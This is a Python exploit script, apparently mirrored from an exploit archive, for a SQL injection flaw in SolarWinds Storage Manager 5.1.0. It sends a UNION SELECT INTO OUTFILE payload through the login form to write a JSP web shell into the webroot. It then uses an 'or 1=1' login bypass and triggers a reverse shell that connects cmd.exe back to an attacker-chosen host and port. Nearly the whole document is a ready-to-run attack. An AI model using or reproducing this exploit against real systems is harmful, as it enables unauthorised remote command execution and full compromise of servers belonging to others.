[EXP]Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection

#!/usr/bin/python
######################################################################################
# Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
# Date: May 2nd 2012
# Author: muts
# Version: SolarWinds Storage Manager 5.1.0
# Tested on: Windows 2003
# Archive Url : http://www.offensive-security.com/0day/solarshell.txt
######################################################################################
# Discovered by Digital Defence - DDIVRT-2011-39
######################################################################################
 
 
import urllib, urllib2, cookielib
import sys
import random
 
print "\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit"
print "[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39"
 
print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 4):
    print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>"
    exit(0)
 
rhost = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]
 
filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6):
    filename+=i
filename +=".jsp"
 
output_path= "c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/%s" %filename
 
jsp = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
 
<%
    class StreamConnector extends Thread
    {
        InputStream is;
        OutputStream os;
 
        StreamConnector( InputStream is, OutputStream os )
        {
        this.is = is;
        this.os = os;
        }
 
        public void run()
        {
        BufferedReader in  = null;
        BufferedWriter out = null;
try
{
    in  = new BufferedReader( new InputStreamReader( this.is ) );
    out = new BufferedWriter( new OutputStreamWriter( this.os ) );
    char buffer[] = new char[8192];
    int length;
    while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
    {
        out.write( buffer, 0, length );
        out.flush();
    }
} catch( Exception e ){}
try
{
    if( in != null )
        in.close();
    if( out != null )
        out.close();
} catch( Exception e ){}
        }
    }
 
    try
    {
        Socket socket = new Socket( "''' + lhost +'''", '''+lport+''');
        Process process = Runtime.getRuntime().exec( "cmd.exe" );
        ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
        ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
    } catch( Exception e ) {}
%>'''
 
jsp = jsp.replace("\n","")
jsp = jsp.replace("\t","")
 
prepayload = "AAA' "
prepayload += 'union select 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "%s"' % (jsp.encode('hex'),output_path)
prepayload += "#"
postpayload = "1' or 1=1#--"
loginstate='checkLogin'
password = 'OHAI'
 
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : prepayload,'password' : password})
print "[*] Sending evil payload"
resp = opener.open("http://%s:9000/LoginServlet" %rhost, post_params)
print "[*] Triggering shell"
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : postpayload,'password' : password})
resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params)
resp = opener.open("http://%s:9000/%s"  % (rhost,filename))
print "[*] Check your shell on %s %s\n" % (lhost,lport)
 
# 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111
# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100
源链接

Hacking more

...